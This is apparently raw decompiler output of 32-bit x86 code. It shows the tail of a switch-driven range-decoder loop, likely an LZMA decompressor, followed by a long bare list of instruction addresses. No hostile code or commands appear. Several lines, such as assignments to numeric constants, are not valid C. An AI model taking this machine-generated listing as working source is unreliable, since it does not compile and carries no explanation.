                                                                                            							__esi =  *(__ebp - 0x58);
                                                                                            							 *(__ebp - 0x84) = 0x12;
                                                                                            							goto L132;
                                                                                            						case 0x12:
                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                            								__eax =  *(__ebp - 0x58);
                                                                                            								 *(__ebp - 0x84) = 0x13;
                                                                                            								__esi =  *(__ebp - 0x58) + 2;
                                                                                            								goto L132;
                                                                                            							}
                                                                                            							__eax =  *(__ebp - 0x4c);
                                                                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                            							__ecx =  *(__ebp - 0x58);
                                                                                            							__eax =  *(__ebp - 0x4c) << 4;
                                                                                            							__eflags = __eax;
                                                                                            							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                            							goto L130;
                                                                                            						case 0x13:
                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                            								_t469 = __ebp - 0x58;
                                                                                            								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                            								__eflags =  *_t469;
                                                                                            								 *(__ebp - 0x30) = 0x10;
                                                                                            								 *(__ebp - 0x40) = 8;
                                                                                            								L144:
                                                                                            								 *(__ebp - 0x7c) = 0x14;
                                                                                            								goto L145;
                                                                                            							}
                                                                                            							__eax =  *(__ebp - 0x4c);
                                                                                            							__ecx =  *(__ebp - 0x58);
                                                                                            							__eax =  *(__ebp - 0x4c) << 4;
                                                                                            							 *(__ebp - 0x30) = 8;
                                                                                            							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                            							L130:
                                                                                            							 *(__ebp - 0x58) = __eax;
                                                                                            							 *(__ebp - 0x40) = 3;
                                                                                            							goto L144;
                                                                                            						case 0x14:
                                                                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                            							__eax =  *(__ebp - 0x80);
                                                                                            							goto L140;
                                                                                            						case 0x15:
                                                                                            							__eax = 0;
                                                                                            							__eflags =  *(__ebp - 0x38) - 7;
                                                                                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                            							__al = __al & 0x000000fd;
                                                                                            							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                            							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                            							goto L120;
                                                                                            						case 0x16:
                                                                                            							__eax =  *(__ebp - 0x30);
                                                                                            							__eflags = __eax - 4;
                                                                                            							if(__eax >= 4) {
                                                                                            								_push(3);
                                                                                            								_pop(__eax);
                                                                                            							}
                                                                                            							__ecx =  *(__ebp - 4);
                                                                                            							 *(__ebp - 0x40) = 6;
                                                                                            							__eax = __eax << 7;
                                                                                            							 *(__ebp - 0x7c) = 0x19;
                                                                                            							 *(__ebp - 0x58) = __eax;
                                                                                            							goto L145;
                                                                                            						case 0x17:
                                                                                            							L145:
                                                                                            							__eax =  *(__ebp - 0x40);
                                                                                            							 *(__ebp - 0x50) = 1;
                                                                                            							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                            							goto L149;
                                                                                            						case 0x18:
                                                                                            							L146:
                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                            								 *(__ebp - 0x88) = 0x18;
                                                                                            								goto L170;
                                                                                            							}
                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							_t484 = __ebp - 0x70;
                                                                                            							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                            							__eflags =  *_t484;
                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							L148:
                                                                                            							_t487 = __ebp - 0x48;
                                                                                            							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                            							__eflags =  *_t487;
                                                                                            							L149:
                                                                                            							__eflags =  *(__ebp - 0x48);
                                                                                            							if( *(__ebp - 0x48) <= 0) {
                                                                                            								__ecx =  *(__ebp - 0x40);
                                                                                            								__ebx =  *(__ebp - 0x50);
                                                                                            								0 = 1;
                                                                                            								__eax = 1 << __cl;
                                                                                            								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                            								__eax =  *(__ebp - 0x7c);
                                                                                            								 *(__ebp - 0x44) = __ebx;
                                                                                            								goto L140;
                                                                                            							}
                                                                                            							__eax =  *(__ebp - 0x50);
                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                            							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                            							__eax =  *(__ebp - 0x58);
                                                                                            							__esi = __edx + __eax;
                                                                                            							 *(__ebp - 0x54) = __esi;
                                                                                            							__ax =  *__esi;
                                                                                            							__edi = __ax & 0x0000ffff;
                                                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            								__cx = __ax;
                                                                                            								__cx = __ax >> 5;
                                                                                            								__eax = __eax - __ecx;
                                                                                            								__edx = __edx + 1;
                                                                                            								__eflags = __edx;
                                                                                            								 *__esi = __ax;
                                                                                            								 *(__ebp - 0x50) = __edx;
                                                                                            							} else {
                                                                                            								 *(__ebp - 0x10) = __ecx;
                                                                                            								0x800 = 0x800 - __edi;
                                                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                            								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                            								 *__esi = __cx;
                                                                                            							}
                                                                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            								goto L148;
                                                                                            							} else {
                                                                                            								goto L146;
                                                                                            							}
                                                                                            						case 0x19:
                                                                                            							__eflags = __ebx - 4;
                                                                                            							if(__ebx < 4) {
                                                                                            								 *(__ebp - 0x2c) = __ebx;
                                                                                            								L119:
                                                                                            								_t393 = __ebp - 0x2c;
                                                                                            								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                            								__eflags =  *_t393;
                                                                                            								L120:
                                                                                            								__eax =  *(__ebp - 0x2c);
                                                                                            								__eflags = __eax;
                                                                                            								if(__eax == 0) {
                                                                                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                            									goto L170;
                                                                                            								}
                                                                                            								__eflags = __eax -  *(__ebp - 0x60);
                                                                                            								if(__eax >  *(__ebp - 0x60)) {
                                                                                            									goto L171;
                                                                                            								}
                                                                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                            								__eax =  *(__ebp - 0x30);
                                                                                            								_t400 = __ebp - 0x60;
                                                                                            								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                            								__eflags =  *_t400;
                                                                                            								goto L123;
                                                                                            							}
                                                                                            							__ecx = __ebx;
                                                                                            							__eax = __ebx;
                                                                                            							__ecx = __ebx >> 1;
                                                                                            							__eax = __ebx & 0x00000001;
                                                                                            							__ecx = (__ebx >> 1) - 1;
                                                                                            							__al = __al | 0x00000002;
                                                                                            							__eax = (__ebx & 0x00000001) << __cl;
                                                                                            							__eflags = __ebx - 0xe;
                                                                                            							 *(__ebp - 0x2c) = __eax;
                                                                                            							if(__ebx >= 0xe) {
                                                                                            								__ebx = 0;
                                                                                            								 *(__ebp - 0x48) = __ecx;
                                                                                            								L102:
                                                                                            								__eflags =  *(__ebp - 0x48);
                                                                                            								if( *(__ebp - 0x48) <= 0) {
                                                                                            									__eax = __eax + __ebx;
                                                                                            									 *(__ebp - 0x40) = 4;
                                                                                            									 *(__ebp - 0x2c) = __eax;
                                                                                            									__eax =  *(__ebp - 4);
                                                                                            									__eax =  *(__ebp - 4) + 0x644;
                                                                                            									__eflags = __eax;
                                                                                            									L108:
                                                                                            									__ebx = 0;
                                                                                            									 *(__ebp - 0x58) = __eax;
                                                                                            									 *(__ebp - 0x50) = 1;
                                                                                            									 *(__ebp - 0x44) = 0;
                                                                                            									 *(__ebp - 0x48) = 0;
                                                                                            									L112:
                                                                                            									__eax =  *(__ebp - 0x40);
                                                                                            									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                            									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                            										_t391 = __ebp - 0x2c;
                                                                                            										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                            										__eflags =  *_t391;
                                                                                            										goto L119;
                                                                                            									}
                                                                                            									__eax =  *(__ebp - 0x50);
                                                                                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                            									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                            									__eax =  *(__ebp - 0x58);
                                                                                            									__esi = __edi + __eax;
                                                                                            									 *(__ebp - 0x54) = __esi;
                                                                                            									__ax =  *__esi;
                                                                                            									__ecx = __ax & 0x0000ffff;
                                                                                            									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                            									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                            									if( *(__ebp - 0xc) >= __edx) {
                                                                                            										__ecx = 0;
                                                                                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                            										__ecx = 1;
                                                                                            										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                            										__ebx = 1;
                                                                                            										__ecx =  *(__ebp - 0x48);
                                                                                            										__ebx = 1 << __cl;
                                                                                            										__ecx = 1 << __cl;
                                                                                            										__ebx =  *(__ebp - 0x44);
                                                                                            										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                            										__cx = __ax;
                                                                                            										__cx = __ax >> 5;
                                                                                            										__eax = __eax - __ecx;
                                                                                            										__edi = __edi + 1;
                                                                                            										__eflags = __edi;
                                                                                            										 *(__ebp - 0x44) = __ebx;
                                                                                            										 *__esi = __ax;
                                                                                            										 *(__ebp - 0x50) = __edi;
                                                                                            									} else {
                                                                                            										 *(__ebp - 0x10) = __edx;
                                                                                            										0x800 = 0x800 - __ecx;
                                                                                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                            										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                            										 *__esi = __dx;
                                                                                            									}
                                                                                            									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            										L111:
                                                                                            										_t368 = __ebp - 0x48;
                                                                                            										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                            										__eflags =  *_t368;
                                                                                            										goto L112;
                                                                                            									} else {
                                                                                            										goto L109;
                                                                                            									}
                                                                                            								}
                                                                                            								__ecx =  *(__ebp - 0xc);
                                                                                            								__ebx = __ebx + __ebx;
                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                            								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                            								 *(__ebp - 0x44) = __ebx;
                                                                                            								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                            									__ecx =  *(__ebp - 0x10);
                                                                                            									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                            									__ebx = __ebx | 0x00000001;
                                                                                            									__eflags = __ebx;
                                                                                            									 *(__ebp - 0x44) = __ebx;
                                                                                            								}
                                                                                            								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            									L101:
                                                                                            									_t338 = __ebp - 0x48;
                                                                                            									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                            									__eflags =  *_t338;
                                                                                            									goto L102;
                                                                                            								} else {
                                                                                            									goto L99;
                                                                                            								}
                                                                                            							}
                                                                                            							__edx =  *(__ebp - 4);
                                                                                            							__eax = __eax - __ebx;
                                                                                            							 *(__ebp - 0x40) = __ecx;
                                                                                            							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                            							goto L108;
                                                                                            						case 0x1a:
                                                                                            							goto L55;
                                                                                            						case 0x1b:
                                                                                            							L75:
                                                                                            							__eflags =  *(__ebp - 0x64);
                                                                                            							if( *(__ebp - 0x64) == 0) {
                                                                                            								 *(__ebp - 0x88) = 0x1b;
                                                                                            								goto L170;
                                                                                            							}
                                                                                            							__eax =  *(__ebp - 0x14);
                                                                                            							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                            							__eflags = __eax -  *(__ebp - 0x74);
                                                                                            							if(__eax >=  *(__ebp - 0x74)) {
                                                                                            								__eax = __eax +  *(__ebp - 0x74);
                                                                                            								__eflags = __eax;
                                                                                            							}
                                                                                            							__edx =  *(__ebp - 8);
                                                                                            							__cl =  *(__eax + __edx);
                                                                                            							__eax =  *(__ebp - 0x14);
                                                                                            							 *(__ebp - 0x5c) = __cl;
                                                                                            							 *(__eax + __edx) = __cl;
                                                                                            							__eax = __eax + 1;
                                                                                            							__edx = 0;
                                                                                            							_t274 = __eax %  *(__ebp - 0x74);
                                                                                            							__eax = __eax /  *(__ebp - 0x74);
                                                                                            							__edx = _t274;
                                                                                            							__eax =  *(__ebp - 0x68);
                                                                                            							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                            							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                            							_t283 = __ebp - 0x64;
                                                                                            							 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                            							__eflags =  *_t283;
                                                                                            							 *( *(__ebp - 0x68)) = __cl;
                                                                                            							goto L79;
                                                                                            						case 0x1c:
                                                                                            							while(1) {
                                                                                            								L123:
                                                                                            								__eflags =  *(__ebp - 0x64);
                                                                                            								if( *(__ebp - 0x64) == 0) {
                                                                                            									break;
                                                                                            								}
                                                                                            								__eax =  *(__ebp - 0x14);
                                                                                            								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                            								__eflags = __eax -  *(__ebp - 0x74);
                                                                                            								if(__eax >=  *(__ebp - 0x74)) {
                                                                                            									__eax = __eax +  *(__ebp - 0x74);
                                                                                            									__eflags = __eax;
                                                                                            								}
                                                                                            								__edx =  *(__ebp - 8);
                                                                                            								__cl =  *(__eax + __edx);
                                                                                            								__eax =  *(__ebp - 0x14);
                                                                                            								 *(__ebp - 0x5c) = __cl;
                                                                                            								 *(__eax + __edx) = __cl;
                                                                                            								__eax = __eax + 1;
                                                                                            								__edx = 0;
                                                                                            								_t414 = __eax %  *(__ebp - 0x74);
                                                                                            								__eax = __eax /  *(__ebp - 0x74);
                                                                                            								__edx = _t414;
                                                                                            								__eax =  *(__ebp - 0x68);
                                                                                            								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                            								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                            								__eflags =  *(__ebp - 0x30);
                                                                                            								 *( *(__ebp - 0x68)) = __cl;
                                                                                            								 *(__ebp - 0x14) = __edx;
                                                                                            								if( *(__ebp - 0x30) > 0) {
                                                                                            									continue;
                                                                                            								} else {
                                                                                            									goto L80;
                                                                                            								}
                                                                                            							}
                                                                                            							 *(__ebp - 0x88) = 0x1c;
                                                                                            							goto L170;
                                                                                            					}
                                                                                            				}
                                                                                            			}













                                                                                            0x00000000
                                                                                            0x0040604c
                                                                                            0x0040604c
                                                                                            0x00406051
                                                                                            0x004060c8
                                                                                            0x004060cf
                                                                                            0x004060d9
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x004066bb
                                                                                            0x004066bb
                                                                                            0x004066c1
                                                                                            0x004066c7
                                                                                            0x004066cd
                                                                                            0x004066e7
                                                                                            0x004066ea
                                                                                            0x004066f0
                                                                                            0x004066fb
                                                                                            0x004066fd
                                                                                            0x004066cf
                                                                                            0x004066cf
                                                                                            0x004066de
                                                                                            0x004066e2
                                                                                            0x004066e2
                                                                                            0x00406707
                                                                                            0x0040672e
                                                                                            0x0040672e
                                                                                            0x00406734
                                                                                            0x00406734
                                                                                            0x00000000
                                                                                            0x00406709
                                                                                            0x00406709
                                                                                            0x0040670d
                                                                                            0x004068bc
                                                                                            0x00000000
                                                                                            0x004068bc
                                                                                            0x00406719
                                                                                            0x00406720
                                                                                            0x00406728
                                                                                            0x0040672b
                                                                                            0x00000000
                                                                                            0x0040672b
                                                                                            0x00406053
                                                                                            0x00406053
                                                                                            0x00406057
                                                                                            0x0040605f
                                                                                            0x00406062
                                                                                            0x00406064
                                                                                            0x00406067
                                                                                            0x00406069
                                                                                            0x0040606e
                                                                                            0x00406071
                                                                                            0x00406078
                                                                                            0x0040607f
                                                                                            0x00406082
                                                                                            0x0040608d
                                                                                            0x00406095
                                                                                            0x00406095
                                                                                            0x0040608f
                                                                                            0x0040608f
                                                                                            0x0040608f
                                                                                            0x00406084
                                                                                            0x00406084
                                                                                            0x00406084
                                                                                            0x0040609c
                                                                                            0x004060ba
                                                                                            0x004060bc
                                                                                            0x0040628f
                                                                                            0x0040628f
                                                                                            0x00406292
                                                                                            0x00406295
                                                                                            0x00406298
                                                                                            0x0040629b
                                                                                            0x0040629e
                                                                                            0x004062a1
                                                                                            0x004062a4
                                                                                            0x004062a7
                                                                                            0x004062ad
                                                                                            0x004062c5
                                                                                            0x004062c8
                                                                                            0x004062cb
                                                                                            0x004062ce
                                                                                            0x004062ce
                                                                                            0x004062d1
                                                                                            0x004062d7
                                                                                            0x004062af
                                                                                            0x004062af
                                                                                            0x004062b7
                                                                                            0x004062bc
                                                                                            0x004062be
                                                                                            0x004062c0
                                                                                            0x004062c0
                                                                                            0x004062e1
                                                                                            0x004062e4
                                                                                            0x00406287
                                                                                            0x0040628d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004062e6
                                                                                            0x00406262
                                                                                            0x00406266
                                                                                            0x0040686e
                                                                                            0x00000000
                                                                                            0x0040686e
                                                                                            0x0040626c
                                                                                            0x0040626f
                                                                                            0x00406272
                                                                                            0x00406276
                                                                                            0x00406279
                                                                                            0x0040627f
                                                                                            0x00406281
                                                                                            0x00406281
                                                                                            0x00406284
                                                                                            0x00000000
                                                                                            0x00406284
                                                                                            0x0040609e
                                                                                            0x0040609e
                                                                                            0x004060a1
                                                                                            0x004060a7
                                                                                            0x004060a9
                                                                                            0x004060a9
                                                                                            0x004060ac
                                                                                            0x004060af
                                                                                            0x004060b1
                                                                                            0x004060b2
                                                                                            0x004060b5
                                                                                            0x00406122
                                                                                            0x00406122
                                                                                            0x00406126
                                                                                            0x00406129
                                                                                            0x0040612c
                                                                                            0x0040612f
                                                                                            0x00406132
                                                                                            0x00406133
                                                                                            0x00406136
                                                                                            0x00406138
                                                                                            0x0040613e
                                                                                            0x00406141
                                                                                            0x00406144
                                                                                            0x00406147
                                                                                            0x0040614a
                                                                                            0x00406150
                                                                                            0x0040616c
                                                                                            0x0040616f
                                                                                            0x00406172
                                                                                            0x00406175
                                                                                            0x0040617c
                                                                                            0x00406182
                                                                                            0x00406186
                                                                                            0x00406152
                                                                                            0x00406152
                                                                                            0x00406156
                                                                                            0x0040615e
                                                                                            0x00406163
                                                                                            0x00406165
                                                                                            0x00406167
                                                                                            0x00406167
                                                                                            0x00406190
                                                                                            0x00406193
                                                                                            0x0040610a
                                                                                            0x0040610a
                                                                                            0x00406110
                                                                                            0x004061c3
                                                                                            0x004061c9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004061cb
                                                                                            0x004061ce
                                                                                            0x004061d1
                                                                                            0x004061d4
                                                                                            0x004061d7
                                                                                            0x004061da
                                                                                            0x004061dd
                                                                                            0x004061e0
                                                                                            0x004061e3
                                                                                            0x004061e9
                                                                                            0x00406201
                                                                                            0x00406204
                                                                                            0x00406207
                                                                                            0x0040620a
                                                                                            0x0040620a
                                                                                            0x0040620d
                                                                                            0x00406213
                                                                                            0x004061eb
                                                                                            0x004061eb
                                                                                            0x004061f3
                                                                                            0x004061f8
                                                                                            0x004061fa
                                                                                            0x004061fc
                                                                                            0x004061fc
                                                                                            0x0040621d
                                                                                            0x00406220
                                                                                            0x0040619e
                                                                                            0x004061a2
                                                                                            0x00406862
                                                                                            0x00000000
                                                                                            0x00406862
                                                                                            0x004061a8
                                                                                            0x004061ab
                                                                                            0x004061ae
                                                                                            0x004061b2
                                                                                            0x004061b5
                                                                                            0x004061bb
                                                                                            0x004061bd
                                                                                            0x004061bd
                                                                                            0x004061c0
                                                                                            0x004061c0
                                                                                            0x00406220
                                                                                            0x00406227
                                                                                            0x00406227
                                                                                            0x00406227
                                                                                            0x0040622b
                                                                                            0x0040622b
                                                                                            0x0040622e
                                                                                            0x00406231
                                                                                            0x00406235
                                                                                            0x0040687a
                                                                                            0x00000000
                                                                                            0x0040687a
                                                                                            0x0040623b
                                                                                            0x0040623e
                                                                                            0x00406241
                                                                                            0x00406244
                                                                                            0x00406247
                                                                                            0x0040624a
                                                                                            0x0040624d
                                                                                            0x0040624f
                                                                                            0x00406252
                                                                                            0x00406255
                                                                                            0x00406258
                                                                                            0x0040625a
                                                                                            0x0040625a
                                                                                            0x0040625a
                                                                                            0x004063f7
                                                                                            0x004063f7
                                                                                            0x004063fa
                                                                                            0x004063fa
                                                                                            0x00000000
                                                                                            0x004063fa
                                                                                            0x0040611c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406199
                                                                                            0x004060e5
                                                                                            0x004060e9
                                                                                            0x00406856
                                                                                            0x004068d2
                                                                                            0x004068da
                                                                                            0x004068e1
                                                                                            0x004068e3
                                                                                            0x004068ea
                                                                                            0x004068ee
                                                                                            0x004068ee
                                                                                            0x004060ef
                                                                                            0x004060f2
                                                                                            0x004060f5
                                                                                            0x004060f9
                                                                                            0x004060fc
                                                                                            0x00406102
                                                                                            0x00406104
                                                                                            0x00406104
                                                                                            0x00406107
                                                                                            0x00000000
                                                                                            0x00406107
                                                                                            0x00406193
                                                                                            0x0040609c
                                                                                            0x00405ed0
                                                                                            0x00405ed0
                                                                                            0x00405ed9
                                                                                            0x004068e7
                                                                                            0x004068e7
                                                                                            0x00000000
                                                                                            0x004068e7
                                                                                            0x00405edf
                                                                                            0x00000000
                                                                                            0x00405eea
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405ef3
                                                                                            0x00405ef6
                                                                                            0x00405ef9
                                                                                            0x00405efd
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405f03
                                                                                            0x00405f06
                                                                                            0x00405f08
                                                                                            0x00405f09
                                                                                            0x00405f0c
                                                                                            0x00405f0e
                                                                                            0x00405f0f
                                                                                            0x00405f11
                                                                                            0x00405f14
                                                                                            0x00405f19
                                                                                            0x00405f1e
                                                                                            0x00405f27
                                                                                            0x00405f3a
                                                                                            0x00405f3d
                                                                                            0x00405f49
                                                                                            0x00405f71
                                                                                            0x00405f73
                                                                                            0x00405f81
                                                                                            0x00405f81
                                                                                            0x00405f85
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405f75
                                                                                            0x00405f75
                                                                                            0x00405f78
                                                                                            0x00405f79
                                                                                            0x00405f79
                                                                                            0x00000000
                                                                                            0x00405f75
                                                                                            0x00405f4f
                                                                                            0x00405f54
                                                                                            0x00405f54
                                                                                            0x00405f5d
                                                                                            0x00405f65
                                                                                            0x00405f68
                                                                                            0x00000000
                                                                                            0x00405f6e
                                                                                            0x00405f6e
                                                                                            0x00000000
                                                                                            0x00405f6e
                                                                                            0x00000000
                                                                                            0x00405f8b
                                                                                            0x00405f8b
                                                                                            0x00405f8f
                                                                                            0x0040683b
                                                                                            0x00000000
                                                                                            0x0040683b
                                                                                            0x00405f98
                                                                                            0x00405fa8
                                                                                            0x00405fab
                                                                                            0x00405fae
                                                                                            0x00405fae
                                                                                            0x00405fae
                                                                                            0x00405fb1
                                                                                            0x00405fb5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405fb7
                                                                                            0x00405fbd
                                                                                            0x00405fe7
                                                                                            0x00405fed
                                                                                            0x00405ff4
                                                                                            0x00000000
                                                                                            0x00405ff4
                                                                                            0x00405fc3
                                                                                            0x00405fc6
                                                                                            0x00405fcb
                                                                                            0x00405fcb
                                                                                            0x00405fd6
                                                                                            0x00405fde
                                                                                            0x00405fe1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406026
                                                                                            0x0040602c
                                                                                            0x0040602f
                                                                                            0x0040603c
                                                                                            0x00406044
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405ffb
                                                                                            0x00405ffb
                                                                                            0x00405fff
                                                                                            0x0040684a
                                                                                            0x00000000
                                                                                            0x0040684a
                                                                                            0x0040600b
                                                                                            0x00406016
                                                                                            0x00406016
                                                                                            0x00406016
                                                                                            0x00406019
                                                                                            0x0040601c
                                                                                            0x0040601f
                                                                                            0x00406024
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004062eb
                                                                                            0x004062ef
                                                                                            0x0040630d
                                                                                            0x00406310
                                                                                            0x00406317
                                                                                            0x0040631a
                                                                                            0x0040631d
                                                                                            0x00406320
                                                                                            0x00406323
                                                                                            0x00406326
                                                                                            0x00406328
                                                                                            0x0040632f
                                                                                            0x00406330
                                                                                            0x00406332
                                                                                            0x00406335
                                                                                            0x00406338
                                                                                            0x0040633b
                                                                                            0x0040633b
                                                                                            0x00406340
                                                                                            0x00000000
                                                                                            0x00406340
                                                                                            0x004062f1
                                                                                            0x004062f4
                                                                                            0x004062f7
                                                                                            0x00406301
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406355
                                                                                            0x00406359
                                                                                            0x0040637c
                                                                                            0x0040637f
                                                                                            0x00406382
                                                                                            0x0040638c
                                                                                            0x0040635b
                                                                                            0x0040635b
                                                                                            0x0040635e
                                                                                            0x00406361
                                                                                            0x00406364
                                                                                            0x00406371
                                                                                            0x00406374
                                                                                            0x00406374
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406398
                                                                                            0x0040639c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063a2
                                                                                            0x004063a6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063ac
                                                                                            0x004063ae
                                                                                            0x004063b2
                                                                                            0x004063b2
                                                                                            0x004063b5
                                                                                            0x004063b9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406409
                                                                                            0x0040640d
                                                                                            0x00406414
                                                                                            0x00406417
                                                                                            0x0040641a
                                                                                            0x00406424
                                                                                            0x00000000
                                                                                            0x00406424
                                                                                            0x0040640f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406430
                                                                                            0x00406434
                                                                                            0x0040643b
                                                                                            0x0040643e
                                                                                            0x00406441
                                                                                            0x00406436
                                                                                            0x00406436
                                                                                            0x00406436
                                                                                            0x00406444
                                                                                            0x00406447
                                                                                            0x0040644a
                                                                                            0x0040644a
                                                                                            0x0040644d
                                                                                            0x00406450
                                                                                            0x00406453
                                                                                            0x00406453
                                                                                            0x00406456
                                                                                            0x0040645d
                                                                                            0x00406462
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004064f0
                                                                                            0x004064f0
                                                                                            0x004064f4
                                                                                            0x00406892
                                                                                            0x00000000
                                                                                            0x00406892
                                                                                            0x004064fa
                                                                                            0x004064fd
                                                                                            0x00406500
                                                                                            0x00406504
                                                                                            0x00406507
                                                                                            0x0040650d
                                                                                            0x0040650f
                                                                                            0x0040650f
                                                                                            0x0040650f
                                                                                            0x00406512
                                                                                            0x00406515
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406573
                                                                                            0x00406573
                                                                                            0x00406577
                                                                                            0x0040689e
                                                                                            0x00000000
                                                                                            0x0040689e
                                                                                            0x0040657d
                                                                                            0x00406580
                                                                                            0x00406583
                                                                                            0x00406587
                                                                                            0x0040658a
                                                                                            0x00406590
                                                                                            0x00406592
                                                                                            0x00406592
                                                                                            0x00406592
                                                                                            0x00406595
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406343
                                                                                            0x00406343
                                                                                            0x00406346
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406682
                                                                                            0x00406686
                                                                                            0x004066a8
                                                                                            0x004066ab
                                                                                            0x004066b5
                                                                                            0x00000000
                                                                                            0x004066b5
                                                                                            0x00406688
                                                                                            0x0040668b
                                                                                            0x0040668f
                                                                                            0x00406692
                                                                                            0x00406692
